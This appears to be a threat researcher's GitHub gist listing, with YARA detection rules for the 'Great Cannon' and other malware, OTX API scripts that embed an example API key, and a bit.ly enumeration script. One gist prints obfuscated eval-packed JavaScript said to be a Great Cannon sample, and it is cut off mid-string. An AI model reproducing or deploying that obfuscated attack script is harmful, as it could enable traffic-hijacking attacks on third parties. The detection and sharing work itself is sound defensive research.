Skip to content

Instantly share code, notes, and snippets.

View chrisdoman's full-sized avatar

chrisdoman

27 followers · 8 following
View GitHub Profile
@chrisdoman
chrisdoman / cannon.rule
Created September 2, 2019 17:32
rule hunt_great_cannon {
strings:
$ = "requesttime_list" nocase wide ascii
$ = "responsetime_list" nocase wide ascii
$ = "cloudflare_js_validate_url" nocase wide ascii
$ = "116.255.226.154" nocase wide ascii
$ = "responsetime-requesttime>TIMEGAP" nocase wide ascii
condition:
any of them
}
@chrisdoman
chrisdoman / cannon_samples.js
Created September 2, 2019 17:22
Samples from the Great Cannon
var _a="(,& vXh)C;sf<H8O1J|iRY9dj?G%m4}n_M'pQZkFyaEP=Ko2/\\x]!cquSV.57B^lW*Utr{z+N-ADg>[we0b\"I6:TL3",_b="^JL,qMP(*IjReDE<xiQYo{tp>8!-[W&hOcbv12Fn\".%4Ks=5 Z]Cl'uXfAHrdGaN/9}zg\\+U6|kSV:;wmyB7T)_03?",_c="DjOx.}S=Q's_\"I:]c[E(g/JG)k!2yY,zBV4>PFu9rp;N1i<%ZUM*?0K5^nX 8td{LAmH6hbolv&\\a7-ReCq|fw+3TW";eval(function(_,b,a,c,n,r){if(n=function(_){return(_<62?"":n(parseInt(_/62)))+((_%=62)>35?String[_a[11]+_c[40]+_b[20]+_c[66]+_b[51]+_a[6]+_b[62]+_c[40]+_b[51]+_b[20]+_c[62]+_b[12]](_+29):_[_c[61]+_c[71]+_a[56]+_c[61]+_a[68]+_a[19]+_c[57]+_b[68]](36))},0==_a[81][_a[68]+_b[12]+_b[23]+_b[52]+_b[62]+_a[53]+_c[80]](0,n)){for(;a--;)r[n(a)]=c[a];c=[function(_){return r[_]||_}],n=function(){return _c[17]+_c[27]+_b[27]+_a[22]+_a[82]+_b[33]+_c[80]+_a[73]+_a[10]+_a[55]+_c[78]+_a[70]+_a[74]+_c[78]+_a[37]+_c[15]},a=1}for(;a--;)c[a]&&(_=_[_c[40]+_a[80]+_b[23]+_b[52]+_b[62]+_a[53]+_b[12]](new RegExp(_a[49]+_a[82]+n(a)+(_b[69]+_a[82]),_a[76]),c[a]));return _}(_c[27]+_c[59]+_b[84]+_c[65]+_b[75]+_a[45]+_b[9]+_c[0]+_a[44]+_a[89]+_b[88]
@chrisdoman
chrisdoman / malware.rules
Created October 1, 2018 19:20
Autogenerated Rules
This file has been truncated, but you can view the full file.
/*
Yara rules to identify malware families, made by Yabin
Auto-generated - plenty of these rules won't work as they rely on looking for compiled code
*/
rule BackdoorAndroidOSCoca_51dc097980b46d053085ff079b153f107d866a27dc19670b79928ec55ab336d7 {
strings:
$a_2 = { 558bebdcdb73a5fdef349bc5b2931e67 }
@chrisdoman
chrisdoman / getReports.py
Last active August 6, 2018 14:46
Quick example to pull reports from OTX with tagged Adversaries (i.e. probably APT)
'''
Quick example to pull reports with tagged Adversaries (i.e. probably APT)
'''
from OTXv2 import OTXv2, IndicatorTypes
# This is the API key for the user "api_example"
otx = OTXv2('766ba1df3ab54db9c0fcbf62ef048c3a04c260e8ca65b6c25346084b7b4719ad')
pulses = otx.getall()
@chrisdoman
chrisdoman / openioc2csv.py
Created March 26, 2018 14:12
# Script to convert openioc to csv
# Forked from PyMisp
# -*- coding: utf-8 -*-
import os
try:
from bs4 import BeautifulSoup
has_bs4 = True
except ImportError:
@chrisdoman
chrisdoman / getBitly.py
Created December 26, 2017 14:59
Get stats on bitly urls
# Script to enumerate bit.ly data - suffers from strict rate limits
import requests, base62
#start = "1dstjX5"
start = 93340621247
def getUrl(url):
try:
r = requests.get(url)
@chrisdoman
chrisdoman / Create Pulse
Created November 7, 2017 11:09
from OTXv2 import OTXv2
# API key for the user api_example
# Pulses will appear at https://otx.alienvault.com/user/api_example/pulses
otx = OTXv2("766ba1df3ab54db9c0fcbf62ef048c3a04c260e8ca65b6c25346084b7b4719ad")
name = 'Test Pulse'
indicators = [
{'indicator': '69.73.130.198', 'type': 'IPv4'},
{'indicator': 'aoldaily.com', 'type': 'Domain'}
]